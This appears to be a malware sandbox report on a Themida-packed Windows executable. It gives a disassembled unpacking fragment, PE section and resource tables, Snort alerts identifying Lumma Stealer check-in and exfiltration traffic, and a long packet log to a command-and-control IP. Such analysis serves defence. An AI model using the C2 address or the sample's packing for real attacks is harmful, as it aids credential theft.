jmp 00007FBA3483A29Bh
mov eax, 00000001h
add dl, dl
jne 00007FBA3483A307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FBA3483A307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jc 00007FBA3483A2ECh
sub eax, ebx
mov ebx, 00000001h
jne 00007FBA3483A32Ah
mov ecx, 00000001h
add dl, dl
jne 00007FBA3483A307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc ecx, ecx
add dl, dl
jne 00007FBA3483A307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jc 00007FBA3483A2ECh
push esi
mov esi, edi
sub esi, ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x27603a	0x50	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x278000	0x17b08	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x3e1600	0x1880	.themida
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x2000	0x23c000	0x21de00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
	0x23e000	0x34018	0x17400	False	0.999957997311828	data	7.997733672919714	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
	0x274000	0xc	0x200	False	0.255859375	data	1.8150191747492925	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata	0x276000	0x2000	0x200	False	0.16796875	data	1.1486424297373619	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x278000	0x17c00	0x17c00	False	0.8396587171052632	data	7.357428751201397	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.themida	0x290000	0x3b6000	0x0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.boot	0x646000	0x194000	0x194000	False	0.9721081422107054	data	7.901810533884448	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x278180	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 11811 x 11811 px/m			0.7943262411347518
RT_ICON	0x2785f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 11811 x 11811 px/m			0.6355534709193246
RT_ICON	0x2796b0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 11811 x 11811 px/m			0.5642116182572614
RT_ICON	0x27bc68	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 11811 x 11811 px/m			0.5340103920642418
RT_ICON	0x27fea0	0xf350	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			1.0004174158746468
RT_GROUP_ICON	0x28f200	0x4c	data			0.7631578947368421
RT_VERSION	0x28f25c	0x3c8	data			0.371900826446281
RT_MANIFEST	0x28f634	0x4d0	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4025974025974026

Imports

DLL	Import
kernel32.dll	GetModuleHandleA
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4104.21.92.9149739802048093 10/24/23-00:06:04.375807	TCP	2048093	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In	49739	80	192.168.2.4	104.21.92.91
192.168.2.4104.21.92.9149738802048094 10/24/23-00:06:04.844317	TCP	2048094	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration	49738	80	192.168.2.4	104.21.92.91
192.168.2.4104.21.92.9149769802048094 10/24/23-00:06:39.731770	TCP	2048094	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration	49769	80	192.168.2.4	104.21.92.91

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2023 00:06:03.996710062 CEST	49738	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.090177059 CEST	80	49738	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.090296984 CEST	49738	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.091068029 CEST	49738	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.091094971 CEST	49738	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.184660912 CEST	80	49738	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.184679985 CEST	80	49738	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.202524900 CEST	80	49738	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.202541113 CEST	80	49738	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.202606916 CEST	49738	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.202764988 CEST	80	49738	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.202778101 CEST	80	49738	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.202814102 CEST	80	49738	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.202825069 CEST	80	49738	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.202832937 CEST	49738	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.202876091 CEST	49738	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.281963110 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.375407934 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.375488997 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.375807047 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.469058037 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.821419001 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.821476936 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.821481943 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.821530104 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.821541071 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.821577072 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.821610928 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.821647882 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.821770906 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.821810007 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.821819067 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.821856976 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.821894884 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.821973085 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.822073936 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.822113991 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.822133064 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.822179079 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.822236061 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.822274923 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.822299957 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.822341919 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.822392941 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.822424889 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.822438002 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.822464943 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.822465897 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.822488070 CEST	80	49739	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:04.822505951 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.824995041 CEST	49739	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.844316959 CEST	49738	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.845207930 CEST	49738	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:04.940541983 CEST	80	49738	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:05.247518063 CEST	80	49738	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:05.247534990 CEST	80	49738	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:05.247700930 CEST	49738	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:05.251369953 CEST	49738	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:05.267672062 CEST	49740	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:05.362740993 CEST	80	49740	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:05.362852097 CEST	49740	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:05.363164902 CEST	49740	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:05.363903046 CEST	49740	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:05.457703114 CEST	80	49740	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:05.458209038 CEST	80	49740	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:05.774220943 CEST	80	49740	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:05.774244070 CEST	80	49740	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:05.774405003 CEST	49740	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:05.776704073 CEST	49740	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:05.789041042 CEST	49741	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:05.883687019 CEST	80	49741	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:05.883775949 CEST	49741	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:05.884090900 CEST	49741	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:05.885238886 CEST	49741	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:05.978882074 CEST	80	49741	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:05.979883909 CEST	80	49741	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:06.299288988 CEST	80	49741	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:06.299313068 CEST	80	49741	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:06.299433947 CEST	49741	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:06.301532984 CEST	49741	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:06.313558102 CEST	49742	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:06.406656027 CEST	80	49742	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:06.406735897 CEST	49742	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:06.406965971 CEST	49742	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:06.407931089 CEST	49742	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:06.499871016 CEST	80	49742	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:06.501036882 CEST	80	49742	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:06.873035908 CEST	80	49742	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:06.873050928 CEST	80	49742	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:06.873102903 CEST	49742	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:06.875248909 CEST	49742	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:06.886765957 CEST	49743	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:06.980015993 CEST	80	49743	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:06.980138063 CEST	49743	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:06.980382919 CEST	49743	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:06.981134892 CEST	49743	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:07.074040890 CEST	80	49743	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:07.074364901 CEST	80	49743	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:07.394889116 CEST	80	49743	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:07.394906044 CEST	80	49743	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:07.394990921 CEST	49743	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:07.396790981 CEST	49743	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:07.407074928 CEST	49744	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:07.500324011 CEST	80	49744	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:07.500576019 CEST	49744	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:07.500668049 CEST	49744	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:07.501434088 CEST	49744	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:07.594108105 CEST	80	49744	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:07.595164061 CEST	80	49744	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:07.917114973 CEST	80	49744	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:07.917128086 CEST	80	49744	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:07.917222977 CEST	49744	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:07.919270992 CEST	49744	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:07.930500031 CEST	49745	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:08.024081945 CEST	80	49745	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:08.024185896 CEST	49745	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:08.024420977 CEST	49745	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:08.025211096 CEST	49745	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:08.117538929 CEST	80	49745	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:08.118155003 CEST	80	49745	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:08.447432041 CEST	80	49745	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:08.447484970 CEST	80	49745	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:08.447586060 CEST	49745	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:08.449942112 CEST	49745	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:08.461443901 CEST	49746	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:08.554764986 CEST	80	49746	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:08.554894924 CEST	49746	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:08.555258989 CEST	49746	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:08.555947065 CEST	49746	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:08.649780989 CEST	80	49746	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:08.650207043 CEST	80	49746	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:08.970582008 CEST	80	49746	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:08.970633030 CEST	80	49746	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:08.970808029 CEST	49746	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:08.972767115 CEST	49746	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:08.993448019 CEST	49747	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:09.088951111 CEST	80	49747	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:09.089032888 CEST	49747	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:09.089277983 CEST	49747	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:09.090106010 CEST	49747	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:09.183842897 CEST	80	49747	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:09.185071945 CEST	80	49747	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:09.386002064 CEST	80	49747	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:09.386145115 CEST	80	49747	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:09.386198044 CEST	49747	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:09.388333082 CEST	49747	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:09.399427891 CEST	49748	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:09.493069887 CEST	80	49748	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:09.493197918 CEST	49748	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:09.493503094 CEST	49748	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:09.494338036 CEST	49748	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:09.587260962 CEST	80	49748	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:09.587878942 CEST	80	49748	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:09.912247896 CEST	80	49748	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:09.912272930 CEST	80	49748	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:09.912343025 CEST	49748	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:09.914468050 CEST	49748	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:09.926856041 CEST	49749	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:10.022033930 CEST	80	49749	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:10.022114992 CEST	49749	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:10.023015022 CEST	49749	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:10.024168968 CEST	49749	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:10.117674112 CEST	80	49749	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:10.118747950 CEST	80	49749	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:10.440375090 CEST	80	49749	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:10.440561056 CEST	80	49749	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:10.440753937 CEST	49749	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:10.442738056 CEST	49749	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:10.833403111 CEST	49750	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:10.928165913 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:10.928273916 CEST	49750	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:10.928529024 CEST	49750	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:10.929316044 CEST	49750	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:11.023895025 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.023966074 CEST	49750	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:11.024378061 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.024424076 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.024455070 CEST	49750	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:11.024507999 CEST	49750	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:11.024601936 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.024655104 CEST	49750	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:11.025212049 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.025291920 CEST	49750	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:11.118084908 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.118669033 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.118736029 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.119163990 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.119229078 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.119713068 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.119807005 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.520572901 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.520591021 CEST	80	49750	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.520757914 CEST	49750	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:11.522674084 CEST	49750	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:11.774451971 CEST	49751	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:11.869273901 CEST	80	49751	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.869339943 CEST	49751	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:11.869568110 CEST	49751	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:11.870296001 CEST	49751	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:11.964068890 CEST	80	49751	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:11.965087891 CEST	80	49751	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:12.278526068 CEST	80	49751	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:12.278544903 CEST	80	49751	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:12.278736115 CEST	49751	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:12.922660112 CEST	49751	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:12.940696001 CEST	49752	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:13.035671949 CEST	80	49752	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:13.035741091 CEST	49752	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:13.035990000 CEST	49752	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:13.036758900 CEST	49752	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:13.130836964 CEST	80	49752	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:13.131223917 CEST	80	49752	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:13.456218004 CEST	80	49752	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:13.456239939 CEST	80	49752	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:13.456399918 CEST	49752	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:13.458435059 CEST	49752	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:13.995759964 CEST	49753	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:14.090856075 CEST	80	49753	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:14.091005087 CEST	49753	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:14.096842051 CEST	49753	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:14.097748995 CEST	49753	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:14.191643953 CEST	80	49753	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:14.192783117 CEST	80	49753	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:14.532269001 CEST	80	49753	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:14.532294035 CEST	80	49753	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:14.532339096 CEST	49753	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:14.534545898 CEST	49753	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:14.545959949 CEST	49754	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:14.640506029 CEST	80	49754	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:14.640629053 CEST	49754	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:14.640863895 CEST	49754	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:14.641531944 CEST	49754	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:14.735785961 CEST	80	49754	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:14.737014055 CEST	80	49754	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:15.070806980 CEST	80	49754	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:15.070836067 CEST	80	49754	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:15.070888996 CEST	49754	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:15.073100090 CEST	49754	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:15.084759951 CEST	49755	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:15.179749012 CEST	80	49755	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:15.179826021 CEST	49755	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:15.181073904 CEST	49755	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:15.181890011 CEST	49755	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:15.275520086 CEST	80	49755	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:15.276010036 CEST	80	49755	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:15.592490911 CEST	80	49755	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:15.592516899 CEST	80	49755	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:15.592552900 CEST	49755	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:15.594890118 CEST	49755	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:15.606034040 CEST	49757	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:15.700838089 CEST	80	49757	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:15.700922012 CEST	49757	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:15.701234102 CEST	49757	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:15.701946974 CEST	49757	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:15.795504093 CEST	80	49757	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:15.797369957 CEST	80	49757	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:16.129363060 CEST	80	49757	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:16.129403114 CEST	80	49757	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:16.129456043 CEST	49757	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:16.131552935 CEST	49757	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:16.198896885 CEST	49758	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:16.294338942 CEST	80	49758	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:16.294408083 CEST	49758	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:16.294651985 CEST	49758	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:16.295645952 CEST	49758	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:16.389183044 CEST	80	49758	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:16.390120983 CEST	80	49758	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:16.752566099 CEST	80	49758	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:16.752584934 CEST	80	49758	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:16.753101110 CEST	49758	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:16.754805088 CEST	49758	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:16.800201893 CEST	49759	80	192.168.2.4	104.21.92.91
